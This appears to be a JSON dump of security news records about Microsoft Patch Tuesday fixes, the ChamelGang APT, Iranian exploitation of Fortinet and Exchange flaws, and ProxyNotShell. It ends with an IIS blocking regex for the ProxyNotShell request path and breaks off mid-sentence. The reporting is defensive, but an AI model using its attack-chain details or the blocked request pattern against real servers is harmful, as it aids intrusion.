issue.\n\n\"An attacker who successfully exploited this vulnerability could gain SYSTEM privileges,\" the company said in an advisory, cautioning that the shortcoming is being actively weaponized in real-world attacks.\n\nThe nature of the flaw also means that the issue is likely chained with other flaws to escalate privilege and carry out malicious actions on the infected host.\n\n\"This specific vulnerability is a local privilege escalation, which means that an attacker would already need to have code execution on a host to use this exploit,\" Kev Breen, director of cyber threat research at Immersive Labs, said.\n\nThree other elevation of privilege vulnerabilities of note relate to Windows Hyper-V ([CVE-2022-37979](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37979>), CVSS score: 7.8), Active Directory Certificate Services ([CVE-2022-37976](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37976>), CVSS score: 8.8), and Azure Arc-enabled Kubernetes cluster Connect ([CVE-2022-37968](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37968>), CVSS score: 10.0).\n\nDespite the \"Exploitation Less Likely\" tag for CVE-2022-37968, Microsoft noted that a successful exploitation of the flaw could permit an \"unauthenticated user to elevate their privileges as cluster admins and potentially gain control over the Kubernetes cluster.\"\n\nElsewhere, [CVE-2022-41043](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41043>) (CVSS score: 3.3) \u2013 an information disclosure vulnerability in Microsoft Office \u2013 is listed as publicly known at the time of release. It could be exploited to leak user tokens and other potentially sensitive information, Microsoft said.\n\nAlso fixed by Redmond are eight privilege escalation flaws in Windows Kernel, 11 remote code execution bugs in Windows Point-to-Point Tunneling Protocol and SharePoint Server, and yet another elevation of privilege vulnerability in the Print Spooler module ([CVE-2022-38028](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38028>), CVSS score: 7.8).\n\nLastly, the Patch Tuesday update further addresses two more privilege escalation flaws in Windows Workstation Service ([CVE-2022-38034](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38034>), CVSS score: 4.3) and Server Service Remote Protocol ([CVE-2022-38045](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38045>), CVSS score: 8.8).\n\nWeb security company Akamai, which discovered the two shortcomings, [said](<https://www.akamai.com/blog/security-research/cold-hard-cache-bypassing-rpc-with-cache-abuse>) they \"take advantage of a design flaw that allows the bypass of [Microsoft [Remote Procedure Call](<https://learn.microsoft.com/en-us/windows/win32/rpc/rpc-start-page>)] security [callbacks](<https://learn.microsoft.com/en-us/windows/win32/rpc/callbacks>) through caching.\"\n\n### Software Patches from Other Vendors\n\nIn addition to Microsoft, security updates have also been released by several vendors to rectify dozens of vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [Android](<https://source.android.com/security/bulletin/2022-10-01>)\n * [Apache Projects](<https://news.apache.org/foundation/entry/the-apache-news-round-up276>)\n * [Apple](<https://support.apple.com/en-us/HT213480>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [CODESYS](<https://www.codesys.com/security/security-reports.html>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [F5](<https://support.f5.com/csp/new-updated-articles>)\n * [Fortinet](<https://www.fortiguard.com/psirt?date=10-2022>) (including an [actively exploited flaw](<https://thehackernews.com/2022/10/fortinet-warns-of-active-exploitation.html>))\n * [GitLab](<https://about.gitlab.com/releases/2022/10/03/gitlab-15-4-2-released/>)\n * [Google Chrome](<https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_11.html>)\n * [IBM](<https://www.ibm.com/blogs/psirt/>)\n * [Lenovo](<https://support.lenovo.com/us/en/product_security/ps500001-lenovo-product-security-advisories>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/October-2022>)\n * [NVIDIA](<https://www.nvidia.com/en-us/security/>)\n * [Qualcomm](<https://docs.qualcomm.com/product/publicresources/securitybulletin/october-2022-bulletin.html>)\n * [Samba](<https://www.samba.org/samba/history/>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n * [Trend Micro](<https://success.trendmicro.com/dcx/s/vulnerability-response?language=en_US>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-12T07:07:00", "type": "thn", "title": "Microsoft Patch Tuesday Fixes New Windows Zero-Day; No Patch for Exchange Server Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-37968", "CVE-2022-37976", "CVE-2022-37979", "CVE-2022-38028", "CVE-2022-38034", "CVE-2022-38045", "CVE-2022-41033", "CVE-2022-41040", "CVE-2022-41043", "CVE-2022-41082"], "modified": "2022-10-12T07:07:54", "id": "THN:0521233945B9471C64D546BD2B006823", "href": "https://thehackernews.com/2022/10/microsoft-patch-tuesday-fixes-new.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-09T12:37:14", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEiQk7skJEo49QfN4ESusan9jBZfTXapDKpnR6CXuJbaNKUBpx7nO684Vj5RRctI8hh09KwyntDYPyeQI-HbWC03E5Uo4ABDXXj3vfb774Dv1G65e03iX30VM0pcCe5hQfxnkW-u1V4gZgZ3L2et_QXqceUwFJfPQDg8aUOWSagSt-l0OGRquNTiLEso>)\n\nA previously undocumented threat actor has been identified as behind a string of attacks targeting fuel, energy, and aviation production industries in Russia, the U.S., India, Nepal, Taiwan, and Japan with the goal of stealing data from compromised networks.\n\nCybersecurity company Positive Technologies dubbed the advanced persistent threat (APT) group ChamelGang \u2014 referring to their chameleellonic capabilities, including disguising \"its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google.\" \n\n\"To achieve their goal, the attackers used a trending penetration method\u2014supply chain,\" the researchers [said](<https://www.ptsecurity.com/ww-en/about/news/positive-technologies-uncovers-new-apt-group-attacking-russia-s-fuel-and-energy-complex-and-aviation-production-industry/>) of one of the incidents investigated by the firm. \"The group compromised a subsidiary and penetrated the target company's network through it. Trusted relationship attacks are rare today due to the complexity of their execution. Using this method [\u2026], the ChamelGang group was able to achieve its goal and steal data from the compromised network.\"\n\nIntrusions mounted by the adversary are believed to have commenced at the end of March 2021, with later attacks in August leveraging what's called the [ProxyShell](<https://thehackernews.com/2021/08/hackers-actively-searching-for.html>) chain of vulnerabilities affecting Microsoft Exchange Servers, the technical details of which were first revealed at the Black Hat USA 2021 security conference earlier that month.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgpU90FEVyvHUv6m3vUITmIj4tJ_Kexp6cw5No4dV8_Po339DpYJtWa0Z-_BTv7hBE9_EkkSjRVlbP2lsM6MxD-x1p1yD_mQOhRoeiBy9vjPZXWBKrrJlJlvEbl4QdL8woMTd4XIY2ZGusd5N0uFaCwXBUiwFnJnXGfU0C-ESawdO8FR9OB4njoQ6oc>)\n\nThe attack in March is also notable for the fact that the operators breached a subsidiary organization to gain access to an unnamed energy company's network by exploiting a flaw in Red Hat JBoss Enterprise Application ([CVE-2017-12149](<https://access.redhat.com/security/cve/CVE-2017-12149>)) to remotely execute commands on the host and deploy malicious payloads that enable the actor to launch the malware with elevated privileges, laterally pivot across the network, and perform reconnaissance, before deploying a backdoor called DoorMe.\n\n\"The infected hosts were controlled by the attackers using the public utility FRP (fast reverse proxy), written in Golang,\" the researchers said. \"This utility allows connecting to a reverse proxy server. The attackers' requests were routed using the socks5 plugin through the server address obtained from the configuration data.\"\n\nOn the other hand, the August attack against a Russian company in the aviation production sector involved the exploitation of ProxyShell flaws (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) to drop additional web shells and conduct remote reconnaissance on the compromised node, ultimately leading to the installation of a modified version of the DoorMe implant that comes with expanded capabilities to run arbitrary commands and carry out file operations.\n\n\"Targeting the fuel and energy complex and aviation industry in Russia isn't unique \u2014 this sector is one of the three most frequently attacked,\" Positive Technologies' Head of Threat Analysis, Denis Kuvshinov, said. \"However, the consequences are serious: Most often such attacks lead to financial or data loss\u2014in 84% of all cases last year, the attacks were specifically created to steal data, and that causes major financial and reputational damage.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-04T12:48:00", "type": "thn", "title": "A New APT Hacking Group Targeting Fuel, Energy, and Aviation Industries", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-10-04T12:48:16", "id": "THN:E95B6A75073DA71CEC73B2E4F0B13622", "href": "https://thehackernews.com/2021/10/a-new-apt-hacking-group-targeting-fuel.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:05", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhKbdRreQ0Go0a6_nNV2mIHF-M4tF8ltZLh-zKh9XlGWei6N3zGQptPV2EVnu-c2aHwmgFtWbz4Xq0tDXGz3Z1dpDgiPu7RVWIwM8bhdGXus6httFDg3Syq5PSXHPDJiYhDv0KxH-eo9jncYNJb4pG6nA_987ryEtxPoAJr1RlSMcy7wdD0dNr3L2mW>)\n\nCybersecurity agencies from Australia, the U.K., and the U.S. on Wednesday [released](<https://us-cert.cisa.gov/ncas/current-activity/2021/11/17/iranian-government-sponsored-apt-cyber-actors-exploiting-microsoft>) a joint advisory warning of active exploitation of Fortinet and Microsoft Exchange ProxyShell vulnerabilities by Iranian state-sponsored actors to gain initial access to vulnerable systems for follow-on activities, including data exfiltration and ransomware.\n\nThe threat actor is believed to have leveraged multiple Fortinet FortiOS vulnerabilities dating back to March 2021 as well as a remote code execution flaw affecting Microsoft Exchange Servers since at least October 2021, according to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Australian Cyber Security Centre (ACSC), and the U.K.'s National Cyber Security Centre (NCSC).\n\nThe agencies did not attribute the activities to a specific advanced persistent threat (APT) actor. Targeted victims include Australian organizations and a wide range of entities across multiple U.S. critical infrastructure sectors, such as transportation and healthcare. The list of flaws being exploited are below \u2014\n\n * [**CVE-2021-34473**](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>) (CVSS score: 9.1) - Microsoft Exchange Server remote code execution vulnerability (aka \"[ProxyShell](<https://thehackernews.com/2021/08/microsoft-exchange-under-attack-with.html>)\")\n * [**CVE-2020-12812**](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>) (CVSS score: 9.8) - [FortiOS SSL VPN 2FA bypass](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) by changing username case\n * [**CVE-2019-5591**](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>) (CVSS score: 6.5) - FortiGate [default configuration](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) does not verify the LDAP server identity\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - [FortiOS system file leak](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>) through SSL VPN via specially crafted HTTP resource requests\n\nBesides exploiting the ProxyShell flaw to gain access to vulnerable networks, CISA and FBI said they observed the adversary abusing a Fortigate appliance in May 2021 to gain a foothold to a web server hosting the domain for a U.S. municipal government. The next month, the APT actors \"exploited a Fortigate appliance to access environmental control networks associated with a U.S.-based hospital specializing in healthcare for children,\" the advisory said.\n\nThe development marks the second time the U.S. government has [alerted](<https://thehackernews.com/2021/08/unpatched-remote-hacking-zero-day-flaw.html>) of advanced persistent threat groups targeting Fortinet FortiOS servers by leveraging CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591 to compromise systems belonging to government and commercial entities.\n\nAs mitigations, the agencies are recommending organizations to immediately patch software affected by the aforementioned vulnerabilities, enforce data backup and restoration procedures, implement network segmentation, secure accounts with multi-factor authentication, and patch operating systems, software, and firmware as and when updates are released.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-17T15:44:00", "type": "thn", "title": "U.S., U.K. and Australia Warn of Iranian Hackers Exploiting Microsoft, Fortinet Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812", "CVE-2021-34473"], "modified": "2021-11-22T07:14:13", "id": "THN:C3B82BB0558CF33CFDC326E596AF69C4", "href": "https://thehackernews.com/2021/11/us-uk-and-australia-warn-of-iranian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-21T08:09:51", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhRGuKS_Ai-L-qiVZdEFGn7uK-IPJWG7OVJuc14ve1BQhS-DNzadyzsxrWDZzT_U-4vHn6Ci6QMVpvC32Z9Li0cvsB5fhO8hcudaqdzaDodQHH9QqF5OxHP1q0hc6lDsxiiiI78HVvCuWDAkmFsBVbFyfojw4TprpKxvvi71j3A6So9cmZFQUnnk7Km/s728-e100/windows.jpg>)\n\nMicrosoft's latest round of monthly security updates has been released with fixes for [68 vulnerabilities](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Nov>) spanning its software portfolio, including patches for six actively exploited zero-days.\n\n12 of the issues are rated Critical, two are rated High, and 55 are rated Important in severity. This also includes the weaknesses that were closed out by [OpenSSL](<https://thehackernews.com/2022/11/just-in-openssl-releases-patch-for-2.html>) the previous week.\n\nAlso separately [addressed](<https://learn.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) in Microsoft Edge at the start of the month is an actively exploited flaw in Chromium-based browsers ([CVE-2022-3723](<https://thehackernews.com/2022/10/google-issues-urgent-chrome-update-to.html>)) that was plugged by Google as part of an out-of-band update late last month.\n\n\"The big news is that [two older zero-day CVEs](<https://thehackernews.com/2022/10/microsoft-issues-improved-mitigations.html>) affecting Exchange Server, made public at the end of September, have finally been fixed,\" Greg Wiseman, product manager at Rapid7, said in a statement shared with The Hacker News.\n\n\"Customers are advised to update their [Exchange Server systems](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-november-2022-exchange-server-security-updates/ba-p/3669045>) immediately, regardless of whether any previously recommended mitigation steps have been applied. The mitigation rules are no longer recommended once systems have been patched.\"\n\nThe list of actively exploited vulnerabilities, which allow privilege elevation and remote code execution, is as follows -\n\n * [**CVE-2022-41040**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41040>) (CVSS score: 8.8) - Microsoft Exchange Server Elevation of Privilege Vulnerability (aka ProxyNotShell)\n * [**CVE-2022-41082**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41082>) (CVSS score: 8.0) - Microsoft Exchange Server Remote Code Execution Vulnerability (aka ProxyNotShell)\n * [**CVE-2022-41128**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41128>) (CVSS score: 8.8) - Windows Scripting Languages Remote Code Execution Vulnerability\n * [**CVE-2022-41125**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41125>) (CVSS score: 7.8) - Windows CNG Key Isolation Service Elevation of Privilege Vulnerability\n * [**CVE-2022-41073**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41073>) (CVSS score: 7.8) - Windows Print Spooler Elevation of Privilege Vulnerability\n * [**CVE-2022-41091**](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41091>) (CVSS score: 5.4) - Windows Mark of the Web Security Feature Bypass Vulnerability\n\nBeno\u00eet Sevens and Cl\u00e9ment Lecigne of Google's Threat Analysis Group (TAG) have been credited with reporting CVE-2022-41128, which resides in the JScript9 component and occurs when a target is tricked into visiting a specially crafted website.\n\nCVE-2022-41091 is one of the [two security bypass flaws](<https://thehackernews.com/2022/10/unofficial-patch-released-for-new.html>) in Windows Mark of the Web (MoTW) that came to light over the past few months. It was recently discovered as weaponized by the Magniber ransomware actor to target users with fake software updates.\n\n\"An attacker can craft a malicious file that would evade Mark of the Web (MotW) defenses, resulting in a limited loss of integrity and availability of security features such as Protected View in Microsoft Office, which rely on MotW tagging,\" Microsoft said in an advisory.\n\nThe second MotW flaw to be resolved is [CVE-2022-41049](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41049>) (aka [ZippyReads](<https://twitter.com/wdormann/status/1590044005395357697>)). Reported by Analygence security researcher Will Dormann, it [relates](<https://breakdev.org/zip-motw-bug-analysis/>) to a failure to set the Mark of the Web flag to extracted archive files.\n\nThe two privilege escalation flaws in Print Spooler and the [CNG Key Isolation Service](<https://learn.microsoft.com/en-us/windows/win32/seccng/key-storage-and-retrieval>) are likely to be abused by threat actors as a follow-up to an initial compromise and gain SYSTEM privileges, Kev Breen, director of cyber threat research at Immersive Labs, said.\n\n\"This higher level of access is required to disable or tamper with security monitoring tools before running credential attacks with tools like Mimikatz that can allow attackers to move laterally across a network,\" Breen added.\n\nFour other Critical-rated vulnerabilities in the November patch worth pointing out are privilege elevation flaws in Windows [Kerberos](<https://support.microsoft.com/en-us/topic/kb5020805-how-to-manage-kerberos-protocol-changes-related-to-cve-2022-37967-997e9acc-67c5-48e1-8d0d-190269bf4efb>) ([CVE-2022-37967](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-37967>)), [Kerberos RC4-HMAC](<https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d>) ([CVE-2022-37966](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37966>)), and Microsoft Exchange Server ([CVE-2022-41080](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41080>)), and a denial-of-service flaw affecting Windows Hyper-V ([CVE-2022-38015](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-38015>)).\n\nThe list of fixes for Critical flaws is tailended by four remote code execution vulnerabilities in the Point-to-Point Tunneling Protocol ([PPTP](<https://en.wikipedia.org/wiki/Point-to-Point_Tunneling_Protocol>)), all carrying CVSS scores of 8.1 ([CVE-2022-41039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41039>), [CVE-2022-41088](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41088>), and [CVE-2022-41044](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41044>)), and another impacting Windows scripting languages JScript9 and Chakra ([CVE-2022-41118](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41118>)).\n\nIn addition to these issues, the Patch Tuesday update also resolves a number of remote code execution flaws in Microsoft Excel, Word, ODBC Driver, Office Graphics, SharePoint Server, and Visual Studio, as well as a handful of privilege escalation bugs in Win32k, Overlay Filter, and Group Policy.\n\n### Software Patches from Other Vendors\n\nMicrosoft aside, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including \u2014\n\n * [AMD](<https://www.amd.com/en/corporate/product-security>)\n * [Android](<https://source.android.com/docs/security/bulletin/2022-11-01>)\n * [Apple](<https://support.apple.com/en-us/HT213496>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [CODESYS](<https://www.codesys.com/security/security-reports.html>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [F5](<https://support.f5.com/csp/new-updated-articles>)\n * [Fortinet](<https://www.fortiguard.com/psirt?date=11-2022>)\n * [GitLab](<https://about.gitlab.com/releases/2022/11/02/security-release-gitlab-15-5-2-released/>)\n * [Google Chrome](<https://chromereleases.googleblog.com/2022/11/stable-channel-update-for-desktop.html>)\n * [HP](<https://support.hp.com/us-en/security-bulletins>)\n * [IBM](<https://www.ibm.com/support/pages/bulletin/>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * [Juniper Networks](<https://supportportal.juniper.net/s/global-search/%40uri?language=en_US#sort=date%20descending&f:ctype=\\[Security%20Advisories\\]>)\n * [Lenovo](<https://support.lenovo.com/us/en/product_security/ps500001-lenovo-product-security-advisories>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/November-2022>)\n * [NVIDIA](<https://www.nvidia.com/en-us/security/>)\n * [Qualcomm](<https://docs.qualcomm.com/product/publicresources/securitybulletin/november-2022-bulletin.html>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n * [Trend Micro](<https://success.trendmicro.com/dcx/s/vulnerability-response?language=en_US>)\n * [VMware](<https://www.vmware.com/security/advisories.html>), and\n * [WordPress](<https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/>)\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-09T05:16:00", "type": "thn", "title": "Install Latest Windows Update ASAP! Patches Issued for 6 Actively Exploited Zero-Days", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-3723", "CVE-2022-37966", "CVE-2022-37967", "CVE-2022-38015", "CVE-2022-41039", "CVE-2022-41040", "CVE-2022-41044", "CVE-2022-41049", "CVE-2022-41073", "CVE-2022-41080", "CVE-2022-41082", "CVE-2022-41088", "CVE-2022-41091", "CVE-2022-41118", "CVE-2022-41125", "CVE-2022-41128"], "modified": "2022-12-21T07:24:53", "id": "THN:31DAA0B9538D69BB42EFB6567298FF49", "href": "https://thehackernews.com/2022/11/install-latest-windows-update-asap.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackread": [{"lastseen": "2022-10-03T06:04:27", "description": "By [Deeba Ahmed](<https://www.hackread.com/author/deeba/>)\n\nThe latest attack against Exchange servers utilizes at least two new flaws (CVE-2022-41040, CVE-2022-41082) that have been assigned CVSS scores of 6.3 and 8.8.\n\nThis is a post from HackRead.com Read the original post: [Microsoft Confirms Two 0-Days Being Exploited Against Exchange Servers](<https://www.hackread.com/microsoft-confirms-0-days-exchange-servers/>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T17:56:35", "type": "hackread", "title": "Microsoft Confirms Two 0-Days Being Exploited Against Exchange Servers", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T17:56:35", "id": "HACKREAD:E34C6E8908AE56B0B1176B1237BFDF36", "href": "https://www.hackread.com/microsoft-confirms-0-days-exchange-servers/", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2022-10-05T00:04:37", "description": "Microsoft has issued some [customer guidance](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as it investigates (yes, more) reported vulnerabilities in Microsoft Exchange Server, affecting the 2013, 2016, and 2019 versions of the software. The company says it \"is aware of limited targeted attacks using the two vulnerabilities to get into users' systems.\" The move follows discussion online about whether two new Exchange [zero-days](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) are really new vulnerabilities, or just [new exploits for known vulnerabilities](<https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9>).\n\nSo, let's start with the most important part: What should you do if you're tasked with administering an Exchange Server? Microsoft is working on an accelerated timeline to release a fix. In the meantime it's providing mitigations and detection guidance:\n\nMicrosoft Exchange Online Customers do not need to take any action.\n\n## Update October 4, 2022\n\nMicrosoft has [adapted the mitigation advice](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) it provided originally to block attacks on these vulnerabilities, because they were too easy to circumvent. The most significant change is the recommendation for Exchange Server customers to disable remote PowerShell access for non-admin users in your organization. Guidance on how to do this for single user or multiple users is [here](<https://learn.microsoft.com/en-us/powershell/exchange/control-remote-powershell-access-to-exchange-servers?view=exchange-ps%22%20\\\\l%20%22use-the-exchange-management-shell-to-enable-or-disable-remote-powershell-access-for-a-user>). Microsoft alos removed the option to block the ports that are used for Remote PowerShell, but doesn't mention this in the updates section.\n\nSome experts are promoting a more effective string to use in the Request Blocking instructions as shown under points 7 and 8 below. The change is minimal, but should be a significant improvement.\n\n`.*autodiscover\\.json.*Powershell.*`\n\nThese were the original instructions:\n\nUsers of the on premises product should add a blocking rule in IIS Manager** **to block the known attack patterns. According to Microsoft, 